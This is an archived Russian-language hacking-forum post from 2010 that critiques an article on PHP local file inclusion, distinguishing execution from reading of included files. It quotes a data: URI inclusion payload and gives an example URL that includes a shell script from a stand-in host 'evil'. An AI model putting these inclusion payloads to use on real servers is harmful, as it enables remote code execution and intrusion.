Показать сообщение отдельно

  #18  
Старый 26.09.2010, 14:13
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от None  
В общем, грубо говоря, мы можем осуществить чтение php-кода (и не только) из файла при наличии LFI.
вообще-то грубо говоря, LFI представляет из себя подключение любого файла на сервере к вызываемому файлу. Что делит LFI на две ветки, либо выполнение содержимого подключаемого файла, либо чтение содержимого подключаемого файла.

И вообще в статье нет упоминания про ограничения, про возможности и про сложности при работе с LFI.

А вот это вот:

Цитата:
Сообщение от None  
http://server/index.php?dir=data:,
Это при*
PHP Version => 5.2.0
allow_url_include = On
уже выходит за рамки LFI так как при allow_url_include = On можно спокойно подключить свой файл из внешнего сервера: vuln.php?targe=http://evil/shell.php?

На мой взгляд тут: http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

всё что нужно знать, есть.
 
Ответить с цитированием